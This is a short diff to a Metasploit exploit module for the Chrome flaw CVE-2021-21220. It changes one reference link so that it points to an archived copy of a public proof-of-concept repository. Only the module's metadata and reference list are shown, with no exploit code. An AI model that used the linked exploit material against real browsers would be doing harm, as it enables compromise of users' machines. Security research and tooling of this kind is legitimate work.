@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2021-21220'],
-          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/chrome-0day'],
+          ['URL', 'http://web.archive.org/web/20210508220051/https://github.com/r4j0x00/exploits/tree/master/chrome-0day'],
           ['URL', 'https://twitter.com/r4j0x00/status/1382125720344793090'],
           ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1196683'], # Restricted at the time of writing, but should be public at some point.
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-21-411/']
